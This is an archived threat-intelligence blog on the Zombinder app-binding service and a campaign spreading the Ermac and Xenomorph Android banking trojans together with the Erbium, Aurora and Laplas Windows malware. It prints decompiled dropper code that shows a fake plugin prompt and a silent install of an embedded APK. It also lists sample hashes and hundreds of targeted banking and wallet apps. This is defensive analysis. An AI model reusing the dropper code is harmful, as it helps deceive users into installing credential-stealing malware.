{
	"id": "558b6b4d-f7a4-4a23-8167-31d1ad568717",
	"created_at": "2026-04-10T03:21:06.631393Z",
	"updated_at": "2026-04-10T03:22:19.437403Z",
	"deleted_at": null,
	"sha1_hash": "c1fb13307fd20c70ede43fdc67df93c6c5ba7adf",
	"title": "Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3164289,
	"plain_text": "Zombinder: new obfuscation service used by Ermac, now distributed\r\nnext to desktop stealers\r\nPublished: 2024-10-01 · Archived: 2026-04-10 02:39:31 UTC\r\nTargeting different platforms and introducing Zombinder\r\nThe history of the threat landscape has seen several cases of threat actors using Trojans targeting different platforms and\r\nsystems. This time while analyzing the activity of the Android banking Trojan Ermac, ThreatFabric’s analysts discovered a\r\ncampaign employing several Trojans, and targeting both Android and Windows users at the same time, in order to reach as\r\nmuch victims as possible. Besides Ermac Android banking Trojan, the campaign involved desktop malware in the form of\r\nErbium, Aurora stealer, and Laplas “clipper”.\r\nThis campaign resulted in thousands of victims, having for example Erbium stealer successfully exfiltrate data from more\r\nthen 1300 victims.\r\nIn this blog we also highlight a third-party service on darknet used to bind malicious payloads to legitimate Android\r\napplications, that we dubbed Zombinder. It is used to bind a malicious payload to a legitimate application, in order to trick\r\nvictims to install it.\r\nEveryone needs Wi-Fi\r\nWhile investigating Ermac’s activity, our researchers spotted an interesting campaign masquerading as applications for Wi-Fi authorization. It was distributed through a fake one-page website containing only two buttons.\r\nAs you might have already guessed, the “Download for Android” button leads to downloading samples of Ermac. We\r\nclassify this variant as Ermac.C, having the following capabilities amongst others that were previously widely reported:\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 1 of 29\n\nOverlay attack to steal PII\r\nKeylogging\r\nStealing e-mails from Gmail application\r\nStealing 2FA codes\r\nStealing seed phrases from several cryptocurrency wallets\r\nIt is worth mentioning that original actor DukeEugene announced a new version of Ermac (“Ermac 3”) coming soon that\r\nwill contain new features, but it is still in development at the time of writing this blog.\r\nDuring the monitoring of abovementioned campaign, we observed several approaches and lures used by the actor. It started\r\nwith Wi-Fi authorization app which in fact was Ermac with obfuscation of the malicious code. Shortly after our monitoring\r\nsystems spotted several updates of the payload: in this stage it was masquerading as browser update. However, another\r\ndetail drew our attention: some of the downloaded apps were not directly Ermac, but a “legitimate” app that, during its\r\nnormal operation, installed Ermac as payload targeting multiple banking applications that can be found in the Appendix.\r\nSuch apps disguised as modified version of Instagram, WiFi Auto Authenticator, Football Live Streaming, etc. The package\r\nnames were also the same as for legitimate applications.\r\nIn fact, the actor used a third-party service provided on darknet to “glue”, or bind, dropper capabilities to a legitimate\r\napplication. After downloading the bound application, it will act as usual unless it shows a message stating that the app\r\nneeds to be updated. At this point, if accepted by the victim, the seemingly legitimate application will install this update,\r\nwhich is nothing else than Ermac. The whole process from installing the application to Ermac running on the device can be\r\nseen on the following picture.\r\nSuch process is achieved by “glueing” obfuscated malicious payload to a legitimate app with minor updates made to original\r\nsource code to include installation and loading of the malicious payload. We called this dropper “Zombinder”, as it takes the\r\noriginal application and binds malicious code to it, making it a “zombie” that installs the desired payload. The following\r\nsnippet provides an example of added code to install and launch the payload.\r\nAlertDialog.Builder alertDialog$Builder0 = new AlertDialog.Builder(this);\r\nalertDialog$Builder0.setMessage(\"This app requires the plugin app to be installed. Please, confirm the installation by the\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 2 of 29\n\nalertDialog$Builder0.setCancelable(false);\r\nalertDialog$Builder0.setPositiveButton(\"OK\", () - \u003e {\r\n new Handler().postDelayed(new Runnable() {\r\n @Override public void run() {\r\n OverlayActivity.this.isInstalled = OverlayActivity.this.isAppInstalled(OverlayActivity.this.target);\r\n }\r\n }, 3000 L);\r\n if (!OverlayActivity.this.isInstalled) {\r\n try {\r\n File file0 = OverlayActivity.this.getApplicationContext().getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS)\r\n File file1 = new File(file0, \"app.apk\");\r\n StringBuilder stringBuilder0 = new StringBuilder();\r\n String s = File.separator;\r\n OverlayActivity.this.copyAssetFile(stringBuilder0.append(file0.toString()).append(s).append(\"app.apk\").toStrin\r\n if (file1.exists()) {\r\n Intent intent0 = new Intent(\"android.intent.action.INSTALL_PACKAGE\");\r\n intent0.setFlags(1);\r\n intent0.setDataAndType(FileProvider.getUriForFile(OverlayActivity.this, \"com.og.appran.pan.fileprovider\",\r\n OverlayActivity.this.startActivity(Intent.createChooser(intent0, \"\"));\r\n }\r\n } catch (IOException unused_ex) {}\r\n OverlayActivity.this.startService(new Intent(OverlayActivity.this, LuckyService.class));\r\n return;\r\n }\r\n try {\r\n Intent intent1 = OverlayActivity.this.getPackageManager().getLaunchIntentForPackage(\"com.fuyocelasisi.woyopu\");\r\n if (intent1 != null) {\r\n OverlayActivity.this.startActivity(intent1);\r\n }\r\n } catch (Exception unused_ex) {}\r\n OverlayActivity.this.finish();\r\n});\r\nThe binding service is provided by an actor well-known in the threat landscape, and is an addition to major project: an\r\nobfuscation tool that is used by multiple actors on Android criminal scene. The binding service itself was announced in\r\nMarch 2022 and now seems to be used frequently by different actors.\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 3 of 29\n\nWe have observed several “zombie” applications used to distribute mobile malware (e.g. Ermac, Sova).\r\nThe latest campaign we identified while writing the blog involving Zombinder was distributing Xenomorph banking\r\ntrojan under the guise of VidMate application. Just like in the abovementioned campaign, modified legitimate application\r\nwas downloaded from malicious website mimicking the original website of the application. Victim is navigated there\r\nthrough malicious advertisement.\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 4 of 29\n\nAs a result, Zombinder drops and launches Xenomorph Trojan while the original app remains fully operational, thus victim\r\nremains unsuspecting. It is worth noting that authors of Xenomorph (known as HadokenSecurity) continue developing the\r\nTrojan. Latest versions of it are enhanced with keylogging functionality, accessibility actions engine as well as SOCKS\r\nproxy feature.\r\nThis campaign of Xenomorph is targeting banking customers from Spain, Portugal, Canada, full target list can be found in\r\nthe Appendix.\r\nMultiple Windows threats\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 5 of 29\n\nHowever, this campaign has another unique characteristic that we had not observed before and that attracted our attention:\r\nthe presence of a “Download for Windows” button on the malicious website distributing Ermac. It is common on the mobile\r\nthreat landscape to utilize multiple Trojans targeting different platforms in one distribution campaign. In this specific case,\r\nthe actor seems to target Android and Windows platforms in order to expand his/her reach as much as possible. But there is\r\nalso an option that this is the same landing shared by different actors distributing Android and Windows Trojans.\r\nNevertheless, our team dived into the desktop malware that was distributed along with Ermac.\r\nErbium Stealer\r\nDuring our investigation we observed several desktop Trojans connected with this campaign. When we first discovered it, an\r\nencrypted archive was distributed, containing the password in the name of the downloaded file. This is a common technique\r\nused by threat actors to avoid detection of the original downloaded file by antivirus engines. This archive contained samples\r\nof Erbium stealer, quite popular Windows Trojan amongst cyber-criminals, that is able to steal (among other data) saved\r\npasswords, credit card details, cookies from various browsers, and “cold” (offline) cryptocurrency wallets data both from\r\ndesktop applications and browser extensions. The stealer is advertised on cyber-criminals’ forums and on Telegram channel.\r\nOur analysts were able to identify more then 1300 victims of this Erbium stealer campaign, highly likely operated by the\r\nsame actor behind above-described Ermac campaign.\r\nLaplas Clipper\r\nNot being satisfied, the actor went further: upon launch of Erbium, another Trojan, Laplas “clipper”, was downloaded and\r\ninstalled on the same infected device. Laplas is a relatively new product on darknet markets, and provides its actors with the\r\nability to substitute cryptocurrency wallet address copied by the victim with one controlled by actor. In such cases, the\r\nunsuspicious victim copies the address that belongs to the planned recipient of the transfer, but the pasted address is\r\nsubstituted with a different one that looks similar to original. As a result, the transfer will be made to another wallet, owned\r\nby the threat actor, while the victim will hardly notice the difference.\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 6 of 29\n\nLaplas poses itself as a “unique” clipper that is able to generate similar wallet addresses that have the same symbols at the\r\nbeginning or at the end. Authors seem to continue updating their Trojan and recently released an update to its panel. The\r\nauthors of Laplas also highlight that their product can be distributed together with stealers, as most of them have the ability\r\nto download and launch executables.\r\nHowever, this is not the end of the story.\r\nAurora Stealer\r\nWhile we were working on this blog, our systems spotted another Windows Trojan that was distributed through the same\r\nmalicious website. This time it was another Windows Trojan stealer known as Aurora. The notable thing about this\r\nparticular build is its size: more than 300 MB. This is probably a tactic to overcome detection by antivirus engines, as most\r\nof the data is just an “overlay” filled with zero bytes. At the same time the actual payload is encrypted and unpacked during\r\nthe execution of the application.\r\nAurora is a Golang stealer that has recently started gaining traction on underground forums.\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 7 of 29\n\nThe presence of such a wide variety of Trojans might also indicate that the malicious landing page is used by multiple actors\r\nand provided to them as a part of third-party distribution service. However, we cannot\r\nConclusion\r\nModern threat landscape becomes more and more sophisticated where actors combine multiple approaches in malware\r\ndevelopment, distribution, operation as well as in performing fraud itself involving multiple tactics at the same time. New\r\ntools appear to make malware less suspicious or more trustworthy for victim which results in more successful fraud cases.\r\nMoreover, targeting multiple platforms, actors are able to reach wider “audience” and steal more PII to utilize in further\r\nfraud.\r\nContinuous monitoring of mobile threat landscape and tracking of different actors and campaigns allow to identify not only\r\nmobile threats but also draw connections to desktop actors/campaigns. Besides, such monitoring pictures an image of\r\nmodern threat landscape where more and more activities are out-sourced and new actors appear providing distribution,\r\nobfuscation, malware development services while already known actors extend their “portfolio”. Threat Intelligence\r\ncollected allows to build effective and proactive solutions to identify new threats and combat with them.\r\nFinancial organizations are welcome to contact us: if you suspect some app be involved in malicious activity, feel free to\r\nreach our Mobile Threat Intelligence team which will provide additional details and help with reporting the malicious app if\r\nidentified: mti@threatfabric.com.\r\nFraud Risk Suite\r\nThreatFabric’s Fraud Risk Suite enables safe \u0026 frictionless online customer journeys by integrating industry-leading mobile\r\nthreat intel, behavioral analytics, advanced device fingerprinting and over 10.000 adaptive fraud indicators. This will give\r\nyou and your customers peace of mind in an age of ever-changing fraud.\r\nAppendix\r\nZombinder Samples\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 8 of 29\n\nApp name Package name SHA-256\r\nWiFi Auto\r\nAuthenticator\r\ncom.woosh.wifiautoauth e633cb7abcf94bc9cb1db637d262739b8458ba9b183ea2166c2537aeb57aa1f7\r\nFootball live\r\nstream\r\ncom.aufait.footballlivestream dc3e51cffb3b05eec4b9249fb5e52b5530faf8db9b8c15474561ebc59ec172e4\r\nOG com.much.dizzy f43813c43174826f26490230ee43e354c7be2f85dd7d096064a017c3ce6cfa41\r\nErmac Samples\r\nApp name Package name SHA-256\r\nWi Fi\r\nAuthorization\r\ncom.welomuxitononu.voretije 97cbc137f8c045cd6a6b7d828b5b97b50279c2901cc67eec121d2c6df2f576be\r\nLive Football\r\nStream 1.9\r\ncom.busafobawori.zuvo 9ed8f39b22b997cb0d2ee8e55336972e1a9feeb222da3c4c23ed6566f29d5a92\r\nOGInsta+\r\nMod\r\ncom.fuyocelasisi.woyopu fd477e257d2d68dd43d1490555ac800ab61febf51d07f18d0ed4568f116952b2\r\nXenomorph Sample\r\nApp name Package name SHA-256\r\nVidMate com.focus.equip 8a7309366917e05c348caf79d4f29f60878958baff794f07c12f08dadcb186fa\r\nErbium Stealer Sample\r\nSHA-256\r\n2ec98ae281b15d4140c4eacf48d485065a354627e2982597f309505c7fc7b90f\r\nLaplas Clipper Sample\r\nSHA-256\r\n4be73a47825a39e0b571baae7dfbb5ee36609d26bc2ec8f6e45e84003bd80fcd\r\nAurora Stealer Sample\r\nSHA-256\r\nfad2f46d3adc1cb7432e5a2dad1ec307bb9f09398341486e7cee9a75a825692e\r\nErmac Targets\r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 9 of 29\n\nPackage name App name  \r\ncom.scb.ae.bmw SC Mobile Banking (UAE)  \r\ncom.snapwork.IDBI IDBI Bank GO Mobile+  \r\ncom.Plus500\r\nPlus500: CFD Online Trading on Forex\r\nand Stocks\r\n \r\ncom.ingbanktr.ingmobil ING Mobil  \r\ncom.paypal.android.p2pmobile\r\nPayPal Mobile Cash: Send and Request\r\nMoney Fast\r\n \r\nuk.co.tsb.newmobilebank TSB Mobile Banking  \r\nuk.co.metrobankonline.mobile.android.production Metro Bank  \r\npt.cgd.caderneta Caderneta  \r\nit.bnl.apps.banking BNL  \r\ncom.android.vending Google Play  \r\ncom.airbitz Bitcoin Wallet - Airbitz  \r\ncom.polehin.android Bitcoin Wallet - Buy BTC  \r\ncom.netflix.mediaclient Netflix  \r\ngr.winbank.mobilenext Winbank Mobile  \r\ncom.db.mm.norisbank norisbank App  \r\ncom.tarjetanaranja.emisor.serviciosClientes.appTitulares Naranja  \r\ncgd.pt.caixadirectaparticulares Caixadirecta  \r\ncom.caisse.epargne.android.tablette Banque pour tablettes Android  \r\ncom.indra.itecban.triodosbank.mobile.banking Triodos Bank. Banca Móvil  \r\npl.millennium.corpApp Bank Millennium for Companies  \r\ncom.imo.android.imoim imo free video calls and chat  \r\nme.cryptopay.android C.PAY  \r\ncom.itau.empresas\r\nItaú Empresas: Controle e Gestão do\r\nseu Negócio\r\n \r\ncom.exmo\r\nEXMO Official - Trading crypto on the\r\nexchange\r\n \r\ncom.bitfinex.mobileapp Bitfinex  \r\ncom.teb CEPTETEB  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 10 of 29\n\nPackage name App name  \r\nde.number26.android N26 — The Mobile Bank  \r\npt.bctt.appbctt Banco CTT  \r\nenterprise.com.anz.shield ANZ Shield  \r\ncom.mercadolibre Mercado Libre: compra fácil y rápido  \r\nde.santander.presentation Santander Banking  \r\nca.hsbc.hsbccanada HSBC Canada  \r\ncom.aadhk.woinvoice Invoice Maker: Estimate \u0026 Invoice App  \r\npl.fakturownia Fakturownia.pl  \r\norg.banksa.bank BankSA Mobile Banking  \r\ncom.hsbc.hsbcnet HSBCnet Mobile  \r\npl.pkobp.ipkobiznes iPKO biznes  \r\nmx.hsbc.hsbcmexico HSBC México  \r\ncom.appfactory.tmb Teachers Mutual Bank  \r\ncom.adcb.bank ADCB  \r\nes.caixageral.caixageralapp Banco Caixa Geral España  \r\nde.ingdiba.bankingapp ING Banking to go  \r\nes.caixagalicia.activamovil ABANCA- Banca Móvil  \r\ncz.csob.smartbanking ČSOB Smartbanking  \r\nco.edgesecure.app\r\nEdge - Bitcoin, Ethereum, Monero,\r\nRipple Wallet\r\n \r\nit.ingdirect.app ING Italia  \r\ngt.com.bi.bienlinea Bi en Línea  \r\ncom.kraken.trade\r\nPro: Advanced Bitcoin \u0026 Crypto\r\nTrading\r\n \r\ncom.cbd.mobile CBD  \r\nhr.asseco.android.mtoken.bos iBOSStoken  \r\ncom.eofinance\r\nEO.Finance: Buy and Sell Bitcoin.\r\nCrypto Wallet\r\n \r\ncom.infrasofttech.CentralBank Cent Mobile  \r\ncom.EurobankEFG Eurobank Mobile App  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 11 of 29\n\nPackage name App name  \r\ncom.azimo.sendmoney Azimo Money Transfer  \r\nde.adesso_mobile.secureapp.netbank SecureApp netbank  \r\nit.creval.bancaperta Bancaperta  \r\nat.spardat.bcrmobile Touch 24 Banking BCR  \r\ncom.barclays.android.barclaysmobilebanking Barclays  \r\ncom.db.pbc.DBPay DB Pay  \r\ncom.uy.itau.appitauuypf Itaú Uruguay  \r\ncom.paxful.wallet Paxful Bitcoin Wallet  \r\nclientapp.swiftcom.org ePayments: wallet \u0026 bank card  \r\ncom.a2a.android.burgan Burgan Bank  \r\nar.macro Macro  \r\ncom.unocoin.unocoinwallet Unocoin Wallet  \r\ncom.citi.mobile.ccc CitiManager – Corporate Cards  \r\neu.inmite.prj.kb.mobilbank Mobilni Banka  \r\ncom.lynxspa.bancopopolare YouApp  \r\nhu.cardinal.cib.mobilapp CIB Business Online  \r\ncom.abanca.bancaempresas ABANCA Empresas  \r\nau.com.ingdirect.android ING Australia Banking  \r\nde.mobile.android.app\r\nmobile.de – Germany‘s largest car\r\nmarket\r\n \r\ncom.albarakaapp Albaraka Mobile Banking  \r\npe.com.interbank.mobilebanking Interbank APP  \r\nau.com.macquarie.banking Macquarie Mobile Banking  \r\ncom.mobileloft.alpha.droid myAlpha Mobile  \r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia  \r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa  \r\nau.com.amp.myportfolio.android My AMP  \r\ncom.bitmarket.trader Aplikacja Bitmarket  \r\neu.netinfo.colpatria.system Scotiabank Colpatria  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 12 of 29\n\nPackage name App name  \r\ncom.BOQSecure BOQ Secure  \r\njp.coincheck.android Bitcoin Wallet Coincheck  \r\nid.co.bitcoin Indodax  \r\ncom.botw.mobilebanking Bank of the West Mobile  \r\ncom.sella.BancaSella Banca Sella  \r\ncom.fibabanka.mobile Fibabanka Corporate Mobile  \r\nes.pibank.customers Pibank  \r\ncom.tencent.mm WeChat  \r\nes.univia.unicajamovil UnicajaMovil  \r\ncom.bbva.netcash BBVA Net Cash\r\nES\r\n\u0026\r\nPT\r\ncom.aol.mobile.aolapp AOL - News, Mail \u0026 Video  \r\nma.gbp.pocketbank Pocket Bank  \r\ncom.comarch.security.mobilebanking ING Business  \r\ncom.getingroup.mobilebanking Getin Mobile  \r\ncom.garanti.cepsubesi Garanti BBVA Mobile  \r\nuk.co.hsbc.hsbcukmobilebanking HSBC UK Mobile Banking  \r\ncom.kasikorn.retail.mbanking.wap K PLUS  \r\nio.ethos.universalwallet Ethos Universal Wallet  \r\ncom.chase.sig.android Chase Mobile  \r\ncom.bbva.bbvacontigo BBVA Spain  \r\nco.mona.android Crypto.com - Buy Bitcoin Now  \r\ncom.todo1.mobile Bancolombia App Personas  \r\ncom.barclaycardus Barclays US  \r\ncom.ebay.mobile\r\neBay: Buy, sell, and save money on\r\nhome essentials\r\n \r\ncom.wf.wellsfargomobile Wells Fargo Mobile  \r\ncom.rbs.mobile.android.natwest NatWest Mobile Banking  \r\ncom.twitter.android.lite Twitter Lite  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 13 of 29\n\nPackage name App name  \r\nio.cex.app.prod CEX.IO Cryptocurrency Exchange  \r\ncom.bankinter.launcher Bankinter Móvil  \r\npl.eurobank2 eurobank mobile 2.0  \r\nalior.bankingapp.android Usługi Bankowe  \r\ncom.db.pbc.mibanco Mi Banco db  \r\ncom.rak RAKBANK Digital Banking  \r\ncom.bankofqueensland.boq BOQ Mobile  \r\ncom.pcfinancial.mobile Simplii Financial  \r\ntr.com.sekerbilisim.mbank ŞEKER MOBİL ŞUBE  \r\ncom.bitpay.wallet BitPay – Secure Bitcoin Wallet  \r\ncom.connectivityapps.hotmail\r\nConnect for Hotmail \u0026 Outlook: Mail\r\nand Calendar\r\n \r\nfr.hsbc.hsbcfrance HSBC France  \r\ncom.bancodebogota.bancamovil Banco de Bogotá  \r\ncom.att.myWireless myAT\u0026T  \r\ncom.unicredit Mobile Banking UniCredit  \r\ncom.btcturk BtcTurk Bitcoin Borsası  \r\ncom.amazon.sellermobile.android Amazon Seller  \r\npl.allegro\r\nAllegro - convenient and secure online\r\nshopping\r\n \r\ncl.bancochile.mbanking Mi Banco de Chile  \r\ncom.bankinter.bkwallet Bankinter Wallet  \r\ncom.santander.bpi Santander Private Banking  \r\nsoftax.pekao.powerpay PeoPay  \r\ncom.vancity.mobileapp Vancity  \r\npl.orange.mojeorange Mój Orange  \r\ncom.ubercab Uber - Request a ride  \r\ncom.westernunion.moneytransferr3app.es\r\nWestern Union ES - Send Money\r\nTransfers Quickly\r\n \r\ncom.denizbank.mobildeniz MobilDeniz  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 14 of 29\n\nPackage name App name  \r\ncom.CredemMobile Credem  \r\ncom.msf.kbank.mobile Kotak - 811 \u0026 Mobile Banking  \r\nwit.android.bcpBankingApp.activoBank ActivoBank  \r\nnet.inverline.bancosabadell.officelocator.android Banco Sabadell App. Your mobile bank  \r\ncom.vipera.ts.starter.MashreqAE Mashreq UAE  \r\ncom.navyfederal.android Navy Federal Credit Union  \r\ncom.samba.mb SambaMobile  \r\ncom.aff.otpdirekt OTP SmartBank  \r\ncom.mobikwik_new\r\nBHIM UPI, Money Transfer, Recharge\r\n\u0026 Bill Payment\r\n \r\nenbd.mobilebanking Emirates NBD  \r\ncom.mtel.androidbea BEA 東亞銀行  \r\npl.aliorbank.aib Alior Mobile  \r\ncom.commbank.netbank CommBank  \r\nit.carige Carige Mobile  \r\ncom.coinbase.android\r\nCoinbase – Buy \u0026 Sell Bitcoin. Crypto\r\nWallet\r\n \r\ncom.sbi.SBIFreedomPlus Yono Lite SBI - Mobile Banking  \r\ncom.abanca.bm.pt ABANCA - Portugal  \r\ncom.google.android.gm Gmail  \r\ncom.sbi.SBAnywhereCorporate SBI Anywhere Corporate  \r\ncom.fusion.beyondbank Beyond Bank Australia  \r\ncc.bitbank.bitbank bitbank - Bitcoin \u0026 Ripple Wallet  \r\npt.novobanco.nbapp NB smart app  \r\ncom.engage.pbb.pbengage2my.release PB engage MY  \r\ncom.cooperativebank.bank The Co-operative Bank  \r\ncom.barclays.ke.mobile.android.ui Barclays Kenya  \r\ncom.infosys.alh Al Hilal Mobile Banking App  \r\nnz.co.asb.asbmobile ASB Mobile Banking  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 15 of 29\n\nPackage name App name  \r\nes.openbank.mobile Openbank – banca móvil  \r\ncom.anz.transactive.global ANZ Transactive - Global  \r\ncom.cibc.android.mobi CIBC Mobile Banking®  \r\ncom.dhanlaxmi.dhansmart.mtc Dhanlaxmi Bank Mobile Banking  \r\ncom.Version1 PNB ONE  \r\nuy.com.brou.token BROU Llave Digital  \r\nes.ibercaja.ibercajaapp Ibercaja  \r\ncom.alahli.mobile.android SNB AlAhli Mobile  \r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely  \r\n בנק הפועלים - ניהול החשבון hapoalim.ideomobile.com\r\ncom.imaginbank.app imaginBank - Your mobile bank  \r\ncom.alrajhiretailapp Al Rajhi Mobile  \r\nfr.lcl.android.customerarea Mes Comptes - LCL  \r\ncom.grupoavaloc1.bancamovil Banco de Occidente Móvil  \r\nat.volksbank.volksbankmobile Volksbank hausbanking  \r\npl.ideabank.mobilebanking Idea Bank PL  \r\ncom.exictos.mbanka.bic Banco BIC, SA  \r\ncom.finansbank.mobile.cepsube QNB Finansbank Mobile Banking  \r\nhu.mkb.mobilapp MKB Mobilalkalmazás  \r\ncom.zellepay.zelle Zelle  \r\npegasus.project.ebh.mobile.android.bundle.mobilebank George Magyarország  \r\ncom.transferwise.android TransferWise Money Transfer  \r\nit.icbpi.mobile Nexi Pay  \r\ncom.todo1.davivienda.mobileapp Davivienda Móvil  \r\ncom.s4m EI Bank  \r\njp.co.smbc.direct 三井住友銀行アプリ  \r\ncom.rsi.Colonya Colonya Caixa Pollença  \r\nfinansbank.enpara Enpara.com Cep Şubesi  \r\ncom.starfinanz.smob.android.sfinanzstatus Sparkasse Ihre mobile Filiale  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 16 of 29\n\nPackage name App name  \r\nit.hype.app Hype  \r\nktbcs.netbank Krungthai NEXT  \r\ncom.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email  \r\ncom.nearform.ptsb permanent tsb  \r\nes.evobanco.bancamovil EVO Banco móvil  \r\ncom.bochk.com BOCHK  \r\ncom.cajasiete.android.cajasietereport Report  \r\ncom.snapwork.hdfc HDFC Bank MobileBanking  \r\ncom.anz.android.gomoney ANZ Australia  \r\ncom.grppl.android.shell.BOS\r\nBank of Scotland Mobile Banking:\r\nsecure on the go\r\n \r\ncom.bancomer.mbanking BBVA México (Bancomer Móvil)  \r\nit.copergmps.rt.pf.android.sp.bmps Banca MPS  \r\neu.eleader.mobilebanking.nbk NBK Mobile Banking  \r\nwww.ingdirect.nativeframe ING España. Banca Móvil  \r\napp.wizink.es WiZink, tu banco senZillo  \r\ncom.bbva.nxt_peru BBVA Perú  \r\nco.zip Zip - Shop Now, Pay Later  \r\ncom.key.android KeyBank Mobile  \r\ncom.pnc.ecommerce.mobile PNC Mobile  \r\ncom.bcp.bank.bcp Banca Móvil BCP  \r\ncom.fusion.banking Bank Australia app  \r\ncom.scb.phone SCB EASY  \r\ncom.mycelium.wallet Mycelium Bitcoin Wallet  \r\nexodusmovement.exodus Exodus: Crypto Bitcoin Wallet  \r\ncom.leumi.leumiwallet לאומי \r\ncom.mail.mobile.android.mail mail.com mail  \r\ncom.zoluxiones.officebanking Banco Santander Perú S.A.  \r\nuy.brou App Móvil del Banco República  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 17 of 29\n\nPackage name App name  \r\ncom.grppl.android.shell.halifax\r\nHalifax: the banking app that gives you\r\nextra\r\n \r\ncom.cajasur.android Cajasur  \r\nwit.android.bcpBankingApp.millennium Millenniumbcp  \r\ncom.paribu.app Paribu  \r\nmy.com.hsbc.hsbcmalaysia HSBC Malaysia  \r\ncom.google.android.youtube YouTube  \r\ncom.bbva.GEMA BBVA Empresas México  \r\nfr.lcl.android.entreprise Pro \u0026 Entreprises LCL  \r\ncom.axabanque.fr AXA Banque France  \r\ncom.td TD Canada  \r\nes.cm.android Bankia  \r\ncom.fortuneo.android\r\nFortuneo, mes comptes banque \u0026\r\nbourse en ligne\r\n \r\norg.banking.bom.businessconnect Bank of Melbourne Business App  \r\ncom.bankaustria.android.olb Bank Austria MobileBanking  \r\ncom.tronlinkpro.wallet TronLink Pro - The Best TRON Wallet  \r\ncom.isis_papyrus.raiffeisen_pay_eyewdg Raiffeisen ELBA  \r\ncom.grppl.android.shell.CMBlloydsTSB73\r\nLloyds Bank Mobile Banking: by your\r\nside\r\n \r\nes.bancosantander.apps Santander  \r\nes.lacaixa.mobile.android.newwapicon CaixaBank  \r\ncom.latuabancaperandroid Intesa Sanpaolo Mobile  \r\nar.bapro BIP Mobile  \r\nar.com.santander.rio.mbanking Santander Argentina  \r\nau.com.newcastlepermanent NPBS Mobile Banking  \r\nfr.bnpp.digitalbanking Hello bank! par BNP Paribas  \r\npl.ing.mojeing Moje ING mobile  \r\ncom.instagram.android Instagram  \r\nau.com.macquarie.authenticator Macquarie Authenticator  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 18 of 29\n\nPackage name App name  \r\ncom.mfoundry.mb.android.mb_136 People’s United Bank Mobile  \r\ncom.pttfinans PTTBank  \r\ncom.desjardins.mobile Desjardins mobile services  \r\ncom.woodforest Woodforest Mobile Banking  \r\npl.bzwbk.bzwbk24 Santander mobile  \r\ncom.konylabs.cbplpat Citi Handlowy  \r\npl.com.rossmann.centauros Rossmann PL  \r\ncom.payoneer.android\r\nPayoneer – Global Payments Platform\r\nfor Businesses\r\n \r\ncom.vakifbank.mobile VakıfBank Mobil Bankacılık  \r\norg.westpac.col Westpac Corporate Mobile  \r\nro.btrl.mobile Banca Transilvania  \r\nca.bnc.android National Bank of Canada  \r\ncom.cm_prod.bad Crédit Mutuel  \r\nit.bcc.iccrea.mycartabcc myCartaBCC  \r\ncom.kutxabank.android Kutxabank  \r\npro.huobi Huobi Global  \r\npl.nestbank.nestbank Nest Bank nowy  \r\ntr.com.hsbc.hsbcturkey HSBC Turkey  \r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent  \r\ncom.magiclick.odeabank Odeabank  \r\ncom.krungsri.kma KMA  \r\ncom.whatsapp WhatsApp Messenger  \r\ncom.moneybookers.skrillpayments.neteller\r\nNETELLER - fast, secure and global\r\nmoney transfers\r\n \r\neu.eleader.mobilebanking.invest plusbank24  \r\ncom.unionbank.ecommerce.mobile.android Union Bank Mobile Banking  \r\nmy.com.maybank2u.m2umobile Maybank2u MY  \r\nde.consorsbank Consorsbank  \r\nhttps://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html\r\nPage 19 of 29\n\nPackage name App name  \r\nit.relaxbanking RelaxBanking Mobile  \r\ncom.pozitron.iscep İşCep - Mobile Banking  \r\ncom.cic_prod.bad CIC  \r\ncom.rbs.mobile.android.rbs\r\nRoyal Bank of Scotland Mobile\r\nBanking\r\n \r\ncoop.bancocredicoop.bancamobile Credicoop Móvil  \r\ncom.indra.itecban.mobile.novobanco NBapp Spain  \r\ncom.bendigobank.mobile Bendigo Bank  \r\ncom.dib.app DIB MOBILE  \r\nit.phoenixspa.inbank Inbank  \r\ncom.caisseepargne.android.mobilebanking Banque  \r\ncom.fullsix.android.labanquepostale.accountaccess La Banque Postale  \r\ncom.suntrust.mobilebanking SunTrust Mobile App  \r\neu.unicreditgroup.hvbapptan HVB Mobile Banking  \r\ncom.ocito.cdn.activity.creditdunord Crédit du Nord pour Mobile  \r\ncom.tideplatform.banking Tide - Smart Mobile Banking  \r\nde.dkb.portalapp DKB-Banking  \r\nit.nogood.container UBI Banca  \r\ncom.bitcoin.mwallet Bitcoin Wallet  \r\ncom.cimbmalaysia CIMB Clicks Malaysia  \r\ncom.imo.android.imoimbeta imo beta free calls and text  